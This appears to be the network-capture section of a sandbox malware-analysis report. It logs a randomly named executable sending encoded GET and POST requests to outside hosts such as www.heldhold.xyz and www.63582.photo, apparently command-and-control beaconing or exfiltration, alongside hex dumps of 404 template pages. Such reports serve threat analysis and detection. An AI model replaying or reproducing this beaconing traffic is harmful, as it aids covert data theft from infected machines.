7a 58 4a 6a 52 42 59 6c 42 4b 6c 50 5a 5a 38 6d 53 6d 50 35 78 39 4d 70 70 6e 48 50 70 50 38 49 6e [TRUNCATED]
                                              Data Ascii: vf5pwn=LAr5q9LyWuo5NUpPUAZ9CveEcPYg+LQXG4GRFQB4sjFQVU4CYuUxHYbRJnnhjoww3J0NfCwLJ5IJ0I5Q/OEFUzQNg5PLNDObjWZGogIn7EdTIN1QMZqCF6w6xz6jGPJRxcGYfrc6XfXgYK0x5xqvCDDBOrf6Klcmb8WavTGUpoh+R/EN0Ga/ArcVT5ug1ZlFyQS0ZYQqG6yuBchKhykOivyG+Kz+2amYrCQD90Pl5CEezenyIOaqf6Iv3J7hMnePt49Uegh5P9kmbIcMZ37JAXwXSkZ8Zljm9rkgK0VnXXzXJjRBYlBKlPZZ8mSmP5x9MppnHPpP8Inkvm07c8mYJ48s7NLWwhg5dFWmt7pr9yNzPjH4vK/3OloO97V1LwnCxOvvoKshRuEUp7XOTGg61dS2v0ObcpHIjQUrQue5v2v02L3eTik8Vg17u/GjULWIWWYJjcLqdS4kY2Xrdhwz0QyN5mKA4uRjx59PoZrC0rGzzyoK9ez376wTwJBoeTcalacH+6oYVqJu3RVQsw4jWirVjfhSXrL6FNvlDZS0EjwyHRxOZDH+xG01YN4GEWgq1N93rf46g/RVR/ME5SIljIos/XqP8foRqRYPX8tAVvrP80u09V1Q4MMJqOAmuQg6L8YwJEdEIQ0kGkAm0+5+ZhI/2gLPnTfj+dbiPdz3bSC32u08/8EonRN2029IoK8UtHmaDju/HM3WQirbWLnHj2H5bxA4cCyCm8y9aOBn1WfvYHrRPeItxP6/a1kxsbrF7EPuyMyyiswcCePeJ4kD1ixHLg2wjCU1cMHNPYd6oai/Up9fdPvHg1kGaK34xg76focRuznjHmoBFKAk1gE8G1OQ3QKTxDuJvsRMXhE9kqpjRlFGQSh4CJsNTm0rG5UoMXZRIWeTZceQ9TfxenoouI21/WMPOYkNvzKmYsJqORk/eRw+rNGYsOsqwMb69BoluyyPWeWw7iXx1UUZvDjg769FkaFxOZ8Hgt+XCVElXENIo [TRUNCATED]
                                              Sep 26, 2024 15:23:27.824871063 CEST1236INHTTP/1.1 404 Not Found
                                              Date: Thu, 26 Sep 2024 13:23:27 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 32106
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                              Sep 26, 2024 15:23:27.824929953 CEST224INData Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                                              Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ...
                                              Sep 26, 2024 15:23:27.824939966 CEST1236INData Raw: 20 4f 57 4c 20 43 41 52 4f 55 53 45 4c 20 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22
                                              Data Ascii: OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/owl.carousel.min.css" rel="stylesheet"> <link href="assets/vendor/owlcarousel/owl.theme.default.min.css" rel="stylesheet"> ... Timeline --> <link rel="stylesheet" href="
                                              Sep 26, 2024 15:23:27.825109005 CEST1236INData Raw: 69 64 3d 22 6a 75 2d 6c 6f 61 64 69 6e 67 2d 73 63 72 65 65 6e 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 64 6f 75 62 6c 65 2d 62 6f 75 6e 63 65 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 63 68 69 6c 64 20
                                              Data Ascii: id="ju-loading-screen"> <div class="sk-double-bounce"> <div class="sk-child sk-double-bounce1"></div> <div class="sk-child sk-double-bounce2"></div> </div></div>... Start Top Header --><div class="fables-forth-background-color
                                              Sep 26, 2024 15:23:27.825119972 CEST1236INData Raw: 2f 69 6d 61 67 65 73 2f 46 72 61 6e 63 65 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 46 72 65 6e 63 68 3c 2f 61 3e 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: /images/France.png" alt="england flag" class="mr-1"> French</a> </div> </div> </div> <div class="col-12 col-sm-5 col-lg-4 text-right"> <p class="fables
                                              Sep 26, 2024 15:23:27.825129986 CEST672INData Raw: 72 22 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 20 64 61 74 61 2d 74 61 72 67 65 74 3d 22 23 66 61 62 6c 65 73 4e 61 76 44 72 6f 70 64 6f 77 6e 22 20 61 72 69 61 2d 63 6f 6e 74
                                              Data Ascii: r" type="button" data-toggle="collapse" data-target="#fablesNavDropdown" aria-controls="fablesNavDropdown" aria-expanded="false" aria-label="Toggle navigation"> <span class="fables-iconmenu-icon text-white font-
                                              Sep 26, 2024 15:23:27.825408936 CEST1236INData Raw: 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20
                                              Data Ascii: aria-expanded="false"> Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1">
                                              Sep 26, 2024 15:23:27.825419903 CEST1236INData Raw: 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63
                                              Data Ascii: toggle" href="#">Headers</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a>
                                              Sep 26, 2024 15:23:27.825428963 CEST448INData Raw: 61 64 65 72 32 2d 74 72 61 6e 73 70 61 72 65 6e 74 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 32 20 54 72 61 6e 73 70 61 72 65 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: ader2-transparent.html">Header 2 Transparent</a></li> <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li>
                                              Sep 26, 2024 15:23:27.825692892 CEST1236INData Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20
                                              Data Ascii: > <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">
                                              Sep 26, 2024 15:23:27.829912901 CEST1236INData Raw: 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64
                                              Data Ascii: ></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.54972767.223.117.189802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:23:30.856440067 CEST523OUTGET /fava/?lHul=nfQTqL40vDEpIp30&vf5pwn=GCDZpLqdSYk7fT5BaAxVCvWfN8QL3LUdfdSMH3wAhEJHSlsoeLITVJbnCwS/lbUV+KMqaRxHJZIr2IJ0lKwQAngPiIKVJBW1l0NVsB5cz1lTXdEnKbnDfocvymGyGvQBrQ== HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.heldhold.xyz
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Sep 26, 2024 15:23:31.454011917 CEST1236INHTTP/1.1 404 Not Found
                                              Date: Thu, 26 Sep 2024 13:23:31 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 32106
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                              Sep 26, 2024 15:23:31.454024076 CEST1236INData Raw: 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73
                                              Data Ascii: strap.min.css" rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL
                                              Sep 26, 2024 15:23:31.454035997 CEST1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e
                                              Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="
                                              Sep 26, 2024 15:23:31.454246998 CEST1236INData Raw: 6d 67 20 73 72 63 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 65 6e 67 6c 61 6e 64 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 45 6e 67 6c 69 73 68
                                              Data Ascii: mg src="assets/custom/images/england.png" alt="england flag" class="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/ima
                                              Sep 26, 2024 15:23:31.454258919 CEST896INData Raw: 22 3e 0a 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 62 72 61 6e 64 20 70 6c 2d 30 22 20 68 72 65 66 3d 22 69 6e 64 65 78 2e
                                              Data Ascii: "> <a class="navbar-brand pl-0" href="index.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" t
                                              Sep 26, 2024 15:23:31.454364061 CEST1236INData Raw: 68 61 73 70 6f 70 75 70 3d 22 74 72 75 65 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: haspopup="true" aria-expanded="false"> Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1">
                                              Sep 26, 2024 15:23:31.454370975 CEST1236INData Raw: 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: -item dropdown-toggle" href="#">Headers</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a>
                                              Sep 26, 2024 15:23:31.454401970 CEST448INData Raw: 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 32 2d 74 72 61 6e 73 70 61 72 65 6e 74 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 32 20 54 72 61 6e 73 70 61 72 65 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: -item" href="header2-transparent.html">Header 2 Transparent</a></li> <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li>
                                              Sep 26, 2024 15:23:31.455368042 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d
                                              Data Ascii: </li> <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">
                                              Sep 26, 2024 15:23:31.455512047 CEST1236INData Raw: 61 64 65 72 20 34 20 4c 69 67 68 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: ader 4 Light</a></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul>
                                              Sep 26, 2024 15:23:31.459045887 CEST1236INData Raw: 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20
                                              Data Ascii: rs</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Footer 1</a>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.549728103.248.137.209802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:23:37.112127066 CEST766OUTPOST /5o7d/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.63582.photo
                                              Origin: http://www.63582.photo
                                              Content-Length: 207
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.63582.photo/5o7d/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 2b 4f 32 78 66 51 56 4c 44 65 57 6a 5a 6b 34 65 2b 4d 76 58 6b 71 6c 63 54 2f 52 76 78 35 33 33 4e 69 4b 35 58 57 35 57 6e 52 38 45 4d 43 63 43 6c 61 6c 63 76 58 6f 62 2b 73 69 72 50 51 47 50 66 43 70 42 74 6f 46 50 54 42 6c 4b 54 62 73 6d 56 65 32 41 78 42 30 63 31 59 71 31 61 6e 79 6b 71 4b 32 37 70 33 61 76 32 2f 56 7a 55 73 58 64 77 75 5a 2b 58 70 38 71 4e 70 75 47 46 57 74 75 62 67 72 57 45 4e 6e 6d 7a 57 4d 63 61 73 4b 56 54 75 4b 4c 33 47 33 2f 39 6f 31 45 56 5a 59 5a 6e 6c 32 66 66 46 61 70 74 36 77 34 30 62 46 67 6f 36 6f 2f 51 75 64 4c 56 35 34 2f 54 69 6f 55 36 55 69 39 48 54 55 3d
                                              Data Ascii: vf5pwn=+O2xfQVLDeWjZk4e+MvXkqlcT/Rvx533NiK5XW5WnR8EMCcClalcvXob+sirPQGPfCpBtoFPTBlKTbsmVe2AxB0c1Yq1anykqK27p3av2/VzUsXdwuZ+Xp8qNpuGFWtubgrWENnmzWMcasKVTuKL3G3/9o1EVZYZnl2ffFapt6w40bFgo6o/QudLV54/TioU6Ui9HTU=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              18192.168.2.549729103.248.137.209802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:23:39.664932966 CEST786OUTPOST /5o7d/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.63582.photo
                                              Origin: http://www.63582.photo
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.63582.photo/5o7d/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 2b 4f 32 78 66 51 56 4c 44 65 57 6a 59 45 6f 65 2f 72 44 58 73 71 6c 66 63 66 52 76 2f 70 33 7a 4e 69 4f 35 58 58 39 34 67 6b 4d 45 43 44 73 43 72 37 6c 63 71 58 6f 62 77 4d 69 75 42 77 47 49 66 43 56 7a 74 6f 4a 50 54 46 4e 4b 54 61 63 6d 57 70 43 44 78 52 30 65 36 34 71 33 56 48 79 6b 71 4b 32 37 70 30 6d 46 32 2f 4e 7a 55 64 48 64 78 4d 78 39 61 4a 38 70 64 35 75 47 4f 32 74 69 62 67 72 30 45 49 2f 41 7a 55 30 63 61 70 75 56 51 36 65 49 69 32 33 35 7a 49 31 4b 55 63 6c 54 69 6c 4b 58 44 30 48 76 73 59 45 6a 78 74 6f 4b 79 59 67 58 44 4f 78 7a 46 71 77 49 43 53 4a 39 67 33 79 4e 5a 45 43 37 75 36 77 72 7a 4d 2b 43 51 6c 72 66 31 78 6e 63 51 36 34 5a
                                              Data Ascii: vf5pwn=+O2xfQVLDeWjYEoe/rDXsqlfcfRv/p3zNiO5XX94gkMECDsCr7lcqXobwMiuBwGIfCVztoJPTFNKTacmWpCDxR0e64q3VHykqK27p0mF2/NzUdHdxMx9aJ8pd5uGO2tibgr0EI/AzU0capuVQ6eIi235zI1KUclTilKXD0HvsYEjxtoKyYgXDOxzFqwICSJ9g3yNZEC7u6wrzM+CQlrf1xncQ64Z


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              19192.168.2.549730103.248.137.209802556C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 26, 2024 15:23:42.211833954 CEST1803OUTPOST /5o7d/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.63582.photo
                                              Origin: http://www.63582.photo
                                              Content-Length: 1243
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.63582.photo/5o7d/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 2b 4f 32 78 66 51 56 4c 44 65 57 6a 59 45 6f 65 2f 72 44 58 73 71 6c 66 63 66 52 76 2f 70 33 7a 4e 69 4f 35 58 58 39 34 67 6b 45 45 43 78 6b 43 72 59 4e 63 74 58 6f 62 75 63 69 76 42 77 47 5a 66 43 4d 36 74 6f 31 66 54 48 46 4b 54 34 55 6d 43 4e 65 44 2b 52 30 65 78 59 71 32 61 6e 7a 6b 71 4a 4f 6e 70 30 32 46 32 2f 4e 7a 55 65 50 64 32 65 5a 39 4a 35 38 71 4e 70 75 42 46 57 74 4f 62 6b 50 4f 45 4a 4c 50 7a 6e 38 63 5a 4a 2b 56 41 63 69 49 67 57 33 37 2b 6f 30 4d 55 63 68 51 69 6d 75 78 44 30 7a 4a 73 62 55 6a 78 4d 4e 4a 72 4a 4d 32 57 75 78 53 4a 62 6f 79 65 32 52 4b 6e 32 65 4c 54 55 33 5a 73 65 74 48 38 38 44 48 55 45 36 6b 76 33 62 7a 51 76 68 59 67 4e 4a 7a 51 58 59 67 58 4c 51 74 66 6a 78 52 48 58 6d 33 71 72 66 41 6d 77 2b 4b 73 36 49 64 31 4c 4f 56 6a 54 47 58 4e 67 56 42 6f 69 58 45 52 50 43 58 50 59 42 6e 39 6b 62 76 32 34 4e 4b 51 32 73 4f 48 55 43 2b 7a 39 56 63 44 48 48 49 53 33 36 59 4d 66 73 78 31 54 73 32 5a 6a 71 75 53 6b 79 49 76 4d 75 70 38 32 6b 6d 43 76 39 [TRUNCATED]
                                              Data Ascii: 